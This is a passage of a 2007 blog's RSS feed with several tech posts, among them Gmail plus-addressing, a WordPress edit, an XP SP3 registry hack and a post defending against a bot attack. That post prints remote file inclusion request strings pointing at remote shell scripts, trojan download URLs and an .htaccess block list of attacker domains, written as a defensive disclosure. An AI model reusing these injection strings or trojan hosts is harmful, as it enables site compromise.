<p><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004669852.gif" alt="Gmail Email services Logo" width="130" height="54" class="fr" longdesc="http://www.shareapic.net/preview2/004669852.gif" />In brief, Gmail services has undocumented <strong>plus-addressing features</strong> (+) since early 2004. The plus-addressing features is mostly used for writing self notes, email filtering and mapping (google maps).</p>
<p><cite class="db" style="margin:10px;padding:10px;">&#8220;Gmail never announce this features (beta forever) as there is no official documentation at Gmail Help Center.&#8221; — Anon </cite></p>
<h2 class="cb" style="border-bottom:1px solid #ccc;padding:3px;margin-top:18px">RFC 2282 - Internet Message Format</h2>
<p>Technically, the plus sign operator is a standard <abbr title="Uniform Resources Identifier">URI</abbr> protocol for handling Email address including telephone and fax (+tel, +fax ). This standard is maintained by Internet Engineering Task Force (<abbr title="The Internet Engineering Task Force">IETF</abbr> Network Group) &rarr; <a href="http://tools.ietf.org/html/rfc2822" title="RFC 2282 Internet Message Format" rel="tag external" rev="vote-for">RFC 2282</a> &#8220;Internet Official Protocol Standards - Internet Message Format&#8221;. </p>
<p><span id="more-82"></span></p>
<h2 class="cb" id="gravatar-signup-process3" style="border-bottom:1px solid #ccc;padding:3px;margin-top:36px">1. Gravatar Signup Process</h2>
<p>The signup pages can be found at the following address &darr;</p>
<ul>
<li><a href="http://site.gravatar.com/signup" rel="external bookmark">http://site.gravatar.com/signup</a></li>
</ul>
<dl id="gravatar-signup" class="profile r" style="font-size: 1.1em;color:#555">
<dt class="title" style="text-align:right;border-bottom:1px solid #ccc;padding:3px;margin:10px 0px">Normal Signup</dt>
<dd>
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/bill-gates-gmail-address-gravatar-signup-page.png' alt='Bill gates gmail address gravatar signup page' style="padding:10px;border:1px solid #eee" class="db" />
</p>
<p><img src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/signup-process-billgates-at-gmail.jpg' alt='gravatar signup process billgates-at-gmail first submission' width="480" height="600" longdesc="http://blog.kakkoi.net/wp-content/uploads/2007/12/signup-process-billgates-at-gmail.jpg" />
</dd>
</dl>
<h2 class="cb" id="gravatar-signup-process-2" style="border-bottom:1px solid #ccc;padding:3px;margin-top:36px">2. Gravatar Sign-up with Gmail Plus-addressing Features</h2>
<dl class="r">
<dt class="title" style="text-align:right;border-bottom:1px solid #ccc;padding:3px;margin:10px 0px">Gmail Forwarding</dt>
<dd>
<p>Example of valid Gmail plus-sign-address code.</p>
<p style="text-align:center">
<img src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/gravatar-bill-gates-signup-process.png' alt='gravatar bill gates signup process' style="padding:10px;border:1px solid #eee" class="db"/></p>
<p><img src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/billgates-gmail-com-gravatar-signup-page.jpg' alt='Billgates-gmail-com gravatar signup page' /></p>
<h2 class="cb" id="gravatar-signup-process" style="border-bottom:1px solid #ccc;padding:3px;margin-top:18px">3. How Does It Work?</h2>
<ul class="xoxo nfo" style="list-style-type:decimal">
<li>Below is raw header received from Gravatar for billgates+mypwned.avatar@gmail.com.
<pre class="db" style="width:450px;height:200px;overflow:auto;border:1px solid #ccc;margin:12px auto;padding:3px 0px 0px 5px">
Delivered-To: billgates@gmail.com
Received: by 10.114.235.16 with SMTP id i16cs666570wah;
 Tue, 11 Dec 2007 02:13:40 -0800 (PST)
Received: by 10.100.247.14 with SMTP id u14mr17188447anh.1196668020044;
 Tue, 11 Dec 2007 02:13:40 -0800 (PST)
Received-SPF: fail (google.com: domain of support@gravatar.com does not designate 72.232.151.155 as permitted sender) client-ip=72.232.151.155;
Received: by 10.36.223.23 with POP3 id v23mf1698886nzg;
 Tue, 11 Dec 2007 02:13:40 -0800 (PST)
X-Gmail-Fetch-Info: billgates@gmail.com 1 smtp.gmail.com 995 billgates
Delivered-To: billgates+mypwned.avatar@gmail.com
Received: by 10.141.85.4 with SMTP id n4cs336075rvl;
 Tue, 11 Dec 2007 02:13:35 -0800 (PST)
Received: by 10.151.7.4 with SMTP id k4mr2609357ybi.1197368014852;
 Tue, 11 Dec 2007 02:13:34 -0800 (PST)
Return-Path: &lt;support@gravatar.com&gt;
Received: from app1.dfw.gravatar.com (155.151.232.72.static.reverse.ltdomains.com [72.232.151.155])
 by mx.google.com with ESMTP id a13si6664003rnc.2007.12.11.02.13.34;
 Tue, 11 Dec 2007 02:13:34 -0800 (PST)
Received-SPF: neutral (google.com: 72.232.151.155 is neither permitted nor denied by best guess record for domain of support@gravatar.com) client-ip=72.232.151.155;
Authentication-Results: mx.google.com; spf=neutral (google.com: 72.232.151.155 is neither permitted nor denied by best guess record for domain of support@gravatar.com) smtp.mail=support@gravatar.com
Received: from gravatar.com (localhost.localdomain [127.0.0.1])
	by app1.dfw.gravatar.com (Postfix) with ESMTP id 50EB08F36CA5
	for &lt;billgates+mypwned.avatar@gmail.com&gt;; Tue, 11 Dec 2007 10:13:34 +0000 (UTC)
Date: Tue, 11 Dec 2007 10:13:34 +0000
From: support@gravatar.com
To: billgates+mypwned.avatar@gmail.com
Message-Id: &lt;475e62ce4f383_94b15911e666750191132@app1.dfw.gravatar.com.tmail&gt;
Subject: Welcome to Gravatar
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8

Welcome to gravatar!

To activate your account, simply click on the link below or paste into the url field on your favorite browser:

http://site.gravatar.com/activate/666aff604f5eba8025c1

When you visit the above page, you'll be able to set your password and create your first gravatar, all for free!

If you have any questions about the system, feel free to contact us anytime at support@gravatar.com.

Tom Werner
Gravatar Founder
</pre>
</li>
<li>When gmail received the email with the plus-addressing code it will split it up as follow
<ul>
<li>billgates+mypwned.avatar@gmail.com</li>
<li>login-name = billgates</li>
<li>filter-name = mypwned.avatar</li>
</ul>
<p>And Gmail will forward the email to the login-name@gmail.com &rarr; billgates@gmail.com.</p>
</li>
</ul>
</dd>
</dl>
<h2 class="cb">Where to start</h2>
<p>Make sure you can received the plus-sign-address email. Try compose new email with the plus sign to yourself. </p>
<p>Example:<br />
Well, assume that your email account is : leeeroyjenkins@gmail.com<br />
So compose new email like so:</p>
<pre>
From: leeeroyjenkins@gmail.com
Send-To: leeeroyjenkins+selftest@gmail.com
Subject: Hello world
Message-Body: Over, Over, Do u read me.
</pre>
<p>That should be all. check the related links for further read on Gmail tips and documentations. </p>
<h2>Extra notes</h2>
<p>There is few special characters you can play with. </p>
<ol class="nfo r cf">
<li><span class="db fl" style="width:60px">Period</span> <span class="db fl" style="width:20px"> . </span><span class="db fl">&rarr; billgates+all.your.base.belong.to.us@gmail.com</span></li>
<li class="cl"><span class="db fl" style="width:60px"> Hypen</span> <span class="db fl" style="width:20px"> - </span><span class="db fl">&rarr; billgates+chuck-norris-fans-club@gmail.com</span></li>
<li class="cl"><span class="db fl" style="width:60px">Asterisk</span><span class="db fl" style="width:20px"> *</span><span class="db fl">&rarr; billgates+my*space@gmail.com</span></li>
</ol>
<h2 id="rel-links" style="margin-top:36px;padding-top:10px;border-top:1px solid #ccc">Related Links</h2>
<ul class="xoxo">
<li><a href="http://groups.google.com/group/Gmail-Help-Discussion">Gmail Official Discussion Group</a></li>
<li><a href="http://jimstips.com/gmailtips/gmail_tip_3_how_to_maintain_notes.html">Jim&#8217;s tip on How to maintain &#8220;notes&#8221; in Gmail</a></li>
<li><a href="http://mail.google.com/support/bin/answer.py?ctx=%67mail&#038;hl=en&#038;answer=7190" rev="google:gmail">Official Gmail Advanced Search Parameters</a>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/tips/how-to-register-multiple-accounts-on-websites-with-single-email-addresses/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to Change Howdy to Hello - WordPress</title>
		<link>http://42.kaizeku.com/wordpress/how-to-change-howdy-to-hello-wordpress/</link>
		<comments>http://42.kaizeku.com/wordpress/how-to-change-howdy-to-hello-wordpress/#comments</comments>
		<pubDate>Sun, 23 Dec 2007 18:11:10 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[howdy]]></category>

		<category><![CDATA[l10n]]></category>

		<category><![CDATA[wordpress admin]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/cms/wordpress/how-to-change-howdy-to-hello-wordpress/</guid>
		<description><![CDATA[This is funny thought. This issue has been around for quite awhile now. <a href="http://photomatt.net/">Matt's</a> said (<em>[wp-hackers] Decision time in re: admin rework</em>) they wont change the <strong>"Howdy"</strong> to "hello" or "G'day" as its a localization specific (l10n). Thats true I can agree with that. But If you think proper greeting is important, you can try the following steps.
<ul>
<li>Open <tt>*/wp-admin/admin-header.php</tt></li>
<li>find on line 46
<pre class="prebox" style="height:40px">
&#60;div id=&#34;user_info&#34;&#62;&#60;p&#62;&#60;?php printf(__('Howdy, &#60;strong&#62;%s&#60;/strong&#62;.'), $user_identity) ?&#62; [&#60;a href=&#34;&#60;?php echo get_option('siteurl'); ?&#62;/wp-login.php?action=logout&#34; title=&#34;&#60;?php _e('Log out of this account') ?&#62;&#34;&#62;&#60;?php _e('Sign Out'); ?&#62;&#60;/a&#62;, &#60;a href=&#34;profile.php&#34;&#62;&#60;?php _e('My Profile'); ?&#62;&#60;/a&#62;] &#60;/p&#62;&#60;/div&#62;
</pre>
</li>
<li>Replace with
<pre class="prebox" style="height:40px">
&#60;div id=&#34;user_info&#34;&#62;&#60;p&#62;&#60;?php echo __('Hello').', &#60;strong&#62;' $user_identity.'&#60;/strong&#62;'; ?&#62; [&#60;a href=&#34;&#60;?php echo get_option('siteurl'); ?&#62;/wp-login.php?action=logout&#34; title=&#34;&#60;?php _e('Log out of this account') ?&#62;&#34;&#62;&#60;?php _e('Sign Out'); ?&#62;&#60;/a&#62;, &#60;a href=&#34;profile.php&#34;&#62;&#60;?php _e('My Profile'); ?&#62;&#60;/a&#62;] &#60;/p&#62;&#60;/div&#62;
</pre>
</ul>


g'day :p]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>This is funny thought. This issue has been around for quite awhile now. <a href="http://photomatt.net/">Matt&#8217;s</a> said (<em>[wp-hackers] Decision time in re: admin rework</em>) they wont change the <strong>&#8220;Howdy&#8221;</strong> to &#8220;hello&#8221; or &#8220;G&#8217;day&#8221; as its a localization specific (l10n). Thats true. But If you think proper greeting is important, you can try the following steps.<br />
<span id="more-108"></span></p>
<h2>Wordpress admin-header.php</h2>
<ul>
<li>Open <tt>*/wp-admin/admin-header.php</tt></li>
<li>Login to WordPress Admin goto Manage > Files > Type in <tt>&#8220;wp-admin/admin-header.php&#8221;</tt><br />
<img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/template-file-editing-wordpress.png' alt='template-file-editing-wordpress.png' />
</li>
<li>find on line 46
<pre class="prebox" style="height:60px;width:550px;overflow:auto">
&lt;div id=&quot;user_info&quot;&gt;&lt;p&gt;&lt;?php printf(__('Howdy, &lt;strong&gt;%s&lt;/strong&gt;.'), $user_identity) ?&gt; [&lt;a href=&quot;&lt;?php echo get_option('siteurl'); ?&gt;/wp-login.php?action=logout&quot; title=&quot;&lt;?php _e('Log out of this account') ?&gt;&quot;&gt;&lt;?php _e('Sign Out'); ?&gt;&lt;/a&gt;, &lt;a href=&quot;profile.php&quot;&gt;&lt;?php _e('My Profile'); ?&gt;&lt;/a&gt;] &lt;/p&gt;&lt;/div&gt;
</pre>
</li>
<li>Replace with
<pre class="prebox" style="height:60px;width:550px;overflow:auto">
&lt;div id=&quot;user_info&quot;&gt;&lt;p&gt;&lt;?php echo __('Hello').', &lt;strong&gt;' $user_identity.'&lt;/strong&gt;'; ?&gt; [&lt;a href=&quot;&lt;?php echo get_option('siteurl'); ?&gt;/wp-login.php?action=logout&quot; title=&quot;&lt;?php _e('Log out of this account') ?&gt;&quot;&gt;&lt;?php _e('Sign Out'); ?&gt;&lt;/a&gt;, &lt;a href=&quot;profile.php&quot;&gt;&lt;?php _e('My Profile'); ?&gt;&lt;/a&gt;] &lt;/p&gt;&lt;/div&gt;
</pre>
</ul>
<p>g&#8217;day :p</p>
<h2>Related Links</h2>
<ul>
<li><a href="http://wordpress.org/extend/ideas/topic.php?id=1023">Wordpress Ideas &#038; Suggestions</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/how-to-change-howdy-to-hello-wordpress/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to bypass MS Download Center and Download WindowsXP SP3 RC</title>
		<link>http://42.kaizeku.com/windows/how-to-bypass-ms-download-center-and-download-windowsxp-sp3-rc/</link>
		<comments>http://42.kaizeku.com/windows/how-to-bypass-ms-download-center-and-download-windowsxp-sp3-rc/#comments</comments>
		<pubDate>Sun, 23 Dec 2007 14:04:56 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Downloads]]></category>

		<category><![CDATA[mircosoft]]></category>

		<category><![CDATA[service pack]]></category>

		<category><![CDATA[sp]]></category>

		<category><![CDATA[sp3]]></category>

		<category><![CDATA[Windows XP SP 3 rc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/windows/how-to-bypass-ms-download-center-and-download-windowsxp-sp3-rc/</guid>
		<description><![CDATA[<strong>Windows XP Service Pack 3</strong> (RC) (12/18/2007) is not release for public yet. Before you try this registry hack, go to MS Download Center and see if you are allowed to download the update package.
<ul>
	<li>Microsoft Download Center &#8594; <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=75ed934c-8423-4386-ad98-36b124a720aa&#038;DisplayLang=en"> Windows XP Service Pack 3 Release Candidate</a>.</li>
</ul>

If the above failed you may try the Beta Tester hack below.

The following registry hack will set you as one of the Beta Tester so you can download SP3 at Microsoft Download Center.

<pre class="prebox" style="height:60px">
@echo off
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\XPSP3 /f 2> NUL 
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\XPSP3 /v RCPreview /t REG_SZ /d 1c667073-b87f-4f52-a479-98c85711d869 /f
</pre>
Copy the above code and save it as [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><strong>Windows XP Service Pack 3</strong> (RC) (12/18/2007) is not release for public yet. Before you try this registry hack, go to MS Download Center and see if you are allowed to download the update package.</p>
<ul>
<li>Microsoft Download Center &rarr; <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=75ed934c-8423-4386-ad98-36b124a720aa&#038;DisplayLang=en"> Windows XP Service Pack 3 Release Candidate</a>.</li>
</ul>
<p>If the above failed you may try the Beta Tester hack below.</p>
<p>The following registry hack will set you as one of the Beta Tester so you can download SP3 at Microsoft Download Center.<br />
<span id="more-106"></span></p>
<pre class="prebox">
@echo off
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\XPSP3 /f 2> NUL
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\XPSP3 /v RCPreview /t REG_SZ /d 1c667073-b87f-4f52-a479-98c85711d869 /f
</pre>
<p>Copy the above code and save it as sp3betatester.bat or sp3betatester.cmd in your &#8220;C:\&#8221;. Run the sp3betatester.* file and go to start &rarr; windows update. You should now see Windows XP SP3 (rc) listed in the available updates. </p>
<p class="padbox"><span class="b">Microsoft Disclaimer</span><br />
This pre-release software is provided for testing purposes only. Microsoft does not recommend installing this software on primary or mission critical systems. Microsoft recommends that you have a backup of your data prior to installing any pre-release software.
</p>
<h2 class="sep">Uninstaller</h2>
<p>SP3 installation has a recovery mode (rollback) make sure System Restore is enable when you setup SP3. You can removed SP3 via Windows Add Remove Programs or by manual using its build in uninstaller at <tt>C:\WINDOWS\$NtServicePackUninstall$\spuninst</tt></p>
<h2 class="sep">External Links</h2>
<ul>
<li><a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=68C48DAD-BC34-40BE-8D85-6BB4F56F5110&#038;displaylang=en">Windows XP Service Pack 3 Overview</a>
<li><a href="http://forums.microsoft.com/TechNet/ShowForum.aspx?ForumID=2010&#038;SiteID=17">Official Windows XP SP3 Forum</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/how-to-bypass-ms-download-center-and-download-windowsxp-sp3-rc/feed/</wfw:commentRss>
		</item>
		<item>
		<title>The Web Standard Group - ACID2 Test page Failed W3C CSS Validation</title>
		<link>http://42.kaizeku.com/owned/acid2-failed-w3c-css-validation/</link>
		<comments>http://42.kaizeku.com/owned/acid2-failed-w3c-css-validation/#comments</comments>
		<pubDate>Sat, 22 Dec 2007 14:53:25 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[owned]]></category>

		<category><![CDATA[acid2]]></category>

		<category><![CDATA[IE8]]></category>

		<category><![CDATA[validation]]></category>

		<category><![CDATA[w3c]]></category>

		<category><![CDATA[web standard group]]></category>

		<category><![CDATA[xhtml]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/owned/acid2-failed-w3c-css-validation/</guid>
		<description><![CDATA[<p>I'm following up recent announcements on IEBLOG <a href="http://blogs.msdn.com/ie/archive/2007/12/19/internet-explorer-8-and-acid2-a-milestone.aspx" rel="nofollow">Internet Explorer 8 and Acid2: A Milestone</a>. To my surprise, the <strong>Web Standard Groups ACID2</strong> Test Page doesn't conform to <strong>W3C CSS Validation</strong>. </p>

<h2 class="sep">The Errors</h2>
9 errors &#038; 31 warnings.
<pre class="prebox">
Sorry! We found the following errors
43 	 Parse Error - second two]
88 	.parser-container div 	Value Error : color orange is not a color value : orange
94 	.parser 	Property error doesn't exist : }
97 	.parser 	Property m rgin doesn't exist : 2em
97 	Parse error - Unrecognized };
99 	.parser 	Value Error : width only 0 can be a length. You must put an unit after your number : 200
100 	.parser 	Value Error : border Lexical error at line 96, column 38. Encountered: "e" (101), after : "! "error;
100 	.parser 	Value Error : border Parse error - Unrecognized }
101 	.parser 	Value Error : background Too many values or values are not recognized : red pink
</pre>
<ul>
	<li>W3c CSS Validation &#8594; <a href="http://jigsaw.w3.org/css-validator/validator?profile=css2&#038;warning=2&#038;uri=http%3A%2F%2Fwww.webstandards.org%2Ffiles%2Facid2%2Ftest.html">http://www.webstandards.org/files/acid2/test.html</a></li>
</ul>
<h2>Full page Screenshot</h2>
<p><a title="ACID2 failed W3C validation" href="http://www.shareapic.net/content.php?id=4999586&#038;owner=noah" rel="nofollow"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004999586.png" longdesc="http://www.shareapic.net/preview2/004999586.png" alt="ACID2 failed W3C validation" width="28" height="130" /></a></p>

]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>I&#8217;m following up recent announcements on IEBLOG <a href="http://blogs.msdn.com/ie/archive/2007/12/19/internet-explorer-8-and-acid2-a-milestone.aspx" rel="nofollow">Internet Explorer 8 and Acid2: A Milestone</a>. To my surprise, the <strong>Web Standard Groups ACID2</strong> Test Page doesn&#8217;t conform to <strong>W3C CSS Validation</strong>. </p>
<p><span id="more-105"></span></p>
<h2 class="sep">The Errors</h2>
<p>9 errors &#038; 31 warnings.</p>
<pre class="prebox" style="width:500px;overflow:auto">
Sorry! We found the following errors
43 	 Parse Error - second two]
88 	.parser-container div 	Value Error : color orange is not a color value : orange
94 	.parser 	Property error doesn't exist : }
97 	.parser 	Property m rgin doesn't exist : 2em
97 	Parse error - Unrecognized };
99 	.parser 	Value Error : width only 0 can be a length. You must put an unit after your number : 200
100 	.parser 	Value Error : border Lexical error at line 96, column 38. Encountered: "e" (101), after : "! "error;
100 	.parser 	Value Error : border Parse error - Unrecognized }
101 	.parser 	Value Error : background Too many values or values are not recognized : red pink
</pre>
<ul>
<li>W3c CSS Validation &rarr; <a href="http://jigsaw.w3.org/css-validator/validator?profile=css2&#038;warning=2&#038;uri=http%3A%2F%2Fwww.webstandards.org%2Ffiles%2Facid2%2Ftest.html">http://www.webstandards.org/files/acid2/test.html</a></li>
</ul>
<h2>Full page Screenshot</h2>
<p><a title="ACID2 failed W3C validation" href="http://www.shareapic.net/content.php?id=4999586&#038;owner=noah" rel="nofollow"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004999586.png" longdesc="http://www.shareapic.net/preview2/004999586.png" alt="ACID2 failed W3C validation" width="28" height="130" /></a></p>
<p><strong>Update:</strong> Just got ping from <a href="http://blog.kaizeku.com">chaoskaizer</a>. She said the CSS ERROR is part of the Web Standards Test Suit. </p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/owned/acid2-failed-w3c-css-validation/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#38; Trojan</title>
		<link>http://42.kaizeku.com/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/</link>
		<comments>http://42.kaizeku.com/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/#comments</comments>
		<pubDate>Fri, 21 Dec 2007 22:48:35 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[injection]]></category>

		<category><![CDATA[Amidalla]]></category>

		<category><![CDATA[libwww-perl]]></category>

		<category><![CDATA[owned]]></category>

		<category><![CDATA[packet spoofing]]></category>

		<category><![CDATA[PHP+Rst.S]]></category>

		<category><![CDATA[ShellBot.B]]></category>

		<category><![CDATA[Trojan]]></category>

		<category><![CDATA[wp]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/</guid>
		<description><![CDATA[<img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/owned.thumbnail.jpg' class="fl" alt='cat owned' longdesc="http://blog.kakkoi.net/wp-content/uploads/2007/12/owned.thumbnail.jpg"/>For this past three days this blog is suffering DOS attack . The attack is still alive now I don't think they will leave yet.

I cant banned this bot directly as they were sending <strong>forge packet</strong> (packet spoofing) as <strong>googlebot </strong> http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP.
<pre class="prebox cl" style="height:100px">
OrgName:    Google Inc.
OrgID:      GOGL
Address:    1600 Amphitheatre Parkway
City:       Mountain View
StateProv:  CA
PostalCode: 94043
Country:    US
</pre>

<p class="padbox" style="background-color:#ffd">At the time being I blocked all remote streams from their random host *.com and "perl bot signature" but blocking will not stop them from hammering this site. I'll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later. </p>

<h2 class="sep">Type of injections</h2>
There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src="http://blog.kakkoi.net/wp-content/uploads/2007/12/owned.thumbnail.jpg" class="fl" alt="cat owned" longdesc="http://blog.kakkoi.net/wp-content/uploads/2007/12/owned.thumbnail.jpg" />For this past three days this blog is suffering DOS attack . The attack is still alive now I don&#8217;t think they will leave yet.</p>
<p>I cant banned this bot directly as they were sending <strong>forge packet</strong> (packet spoofing) as <strong>googlebot </strong> http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP.</p>
<pre class="prebox cl" style="height: 100px">
OrgName: Google Inc.
OrgID: GOGL
Address: 1600 Amphitheatre Parkway
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US</pre>
<p><span id="more-103"></span></p>
<p class="padbox notice">At the time being I blocked all remote streams from their random host *.com and &#8220;perl bot signature&#8221; but blocking will not stop them from hammering this site. I&#8217;ll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later.</p>
<h2 class="sep">Type of injections</h2>
<p>There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.</p>
<pre class="prebox">
/es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja
 gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/order.php?wp=http://hom3.t35.com/xpl/hack/id.txt?</pre>
<p>To view the following source you need to exclude the website host from your anti-virus program.</p>
<ul>
<li> <strong>Perl/ShellBot.B trojan</strong> - http://hom3.t35.com/xpl/fidz/hack/bnc.txt</li>
<li> <strong>PHP/Rst.S Trojan</strong> - http://hom3.t35.com/xpl/fidz</li>
</ul>
<h2 class="cb">htaccess blocked bad Code Injector and Perl Bot (Botnet)</h2>
<p>If you has similar problems. you should block the following domain in your htaccess.<br />
mod_setenvif</p>
<pre class="prebox">
SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1
SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1
SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1

&lt;FilesMatch "(.*)"&gt;
Order Allow,Deny
Allow from all
Deny from env=codeinjector_ref
Deny from env=shell_bots
&lt;/FilesMatch&gt;
</pre>
<p>if u arent sure if you server support mod_setenvif wrap it like the below example.</p>
<pre>
&lt;IfModule mod_setenvif.c&gt;
#...replace this line with the above code...
&lt;/IfModule&gt;</pre>
<h2 class="sep">How to trap Perl Shell Bot</h2>
<p>We need a pattern to trap this bots. certainly we knew that these bots :</p>
<ul>
<li>doesn&#8217;t honor robot.txt</li>
<li>they crawl all subdirectory</li>
<li>they has a pattern URI request</li>
</ul>
<p>For now I only create subdirectory for auto-ban (and some other stuff) based on their pattern. alexa bot will be banned too as they dont honor robot.txt.</p>
<p>I&#8217;ll be updating this post from time to time. Do check the related articles on how to packet spoofing and validating forge/spoof packet.</p>
<h2 class="sep">Recent Scan &amp; Update</h2>
<p>The below list is automatically added.</p>
<dl id="code-injections" class="xoxo cf">
<dt class="title" style="border-top: 1px solid #eeeeee; padding: 3px 0pt; margin-top: 4px">December 24, 2007</dt>
<dd>ip: <tt>64.26.63.10</tt> param: <tt>login=</tt>,<tt>?</tt> inject: <tt>http://pawang.in/r57.txt</tt></dd>
<dt class="title" style="border-top: 1px solid #eeeeee; padding: 3px 0pt; margin-top: 4px">December 24, 2007</dt>
<dd>ip: <tt>64.26.63.10</tt> param: <tt>dir=</tt>,<tt>login=</tt> inject: <tt>http://pawang.in/r57.txt????</tt></dd>
<dt class="title" style="border-top: 1px solid #eeeeee; padding: 3px 0pt; margin-top: 4px">December 25, 2007</dt>
<dd>ip: <tt>59.158.128.138</tt> param: <tt>p=</tt>,<tt>:allinurl=</tt> inject: <tt>http://gw-gold.net/jpg/pictures/test.txt</tt></dd>
</dl>
<h2 class="sep">External Resources</h2>
<ul>
<li><a href="http://www.wireshark.org">Packet spoofing - http://www.wireshark.org</a></li>
<li><a href="http://www.eff.org/testyourisp/pcapdiff/">pcapdiff validate forged packet http://www.eff.org/testyourisp/pcapdiff/</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Merry Christmas &#038; happy holidays</title>
		<link>http://42.kaizeku.com/ranting/merry-christmas-happy-holidays/</link>
		<comments>http://42.kaizeku.com/ranting/merry-christmas-happy-holidays/#comments</comments>
		<pubDate>Tue, 18 Dec 2007 21:21:12 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[ranting]]></category>

		<category><![CDATA[holidays]]></category>

		<category><![CDATA[merry+christmas]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/ranting/merry-christmas-happy-holidays/</guid>
		<description><![CDATA[Localization:
<table align="center" width="75%">
<tr>
<td width="150">Afrikaans</td>
<td>Gesëende Kersfees</td>
</tr>
<tr>
<td>Afrikander</td>
<td>Een Plesierige Kerfees</td>
</tr>
<tr>
<td valign="top">African/ Eritrean/ Tigrinja</td>
<td valign="top">Rehus-Beal-Ledeats</td>
</tr>
<tr>
<td valign="top">Albanian</td>
<td valign="top">Gezur Krislinjden</td>
</tr>
<tr>
<td valign="top">Arabic:</td>
<td valign="top">Idah Saidan Wa Sanah Jadidah</td>
</tr>
<tr>
<td valign="top">Argentine:</td>
<td valign="top">Feliz Navidad</td>
</tr>
<tr>
<td valign="top">Armenian:</td>
<td valign="top">Shenoraavor Nor Dari yev Pari Gaghand</td>
</tr>
<tr>
<td valign="top">Azeri:</td>
<td valign="top">Tezze Iliniz Yahsi Olsun</td>
</tr>
<tr>
<td valign="top">Bahasa Malaysia:</td>
<td valign="top">Selamat Hari Natal</td>
</tr>
<tr>
<td valign="top">Basque:</td>
<td valign="top">Zorionak eta Urte Berri On!</td>
</tr>
<tr>
<td valign="top">Bengali:</td>
<td valign="top">Shuvo Naba Barsha</td>
</tr>
<tr>
<td valign="top">Bohemian:</td>
<td valign="top">Vesele Vanoce</td>
</tr>
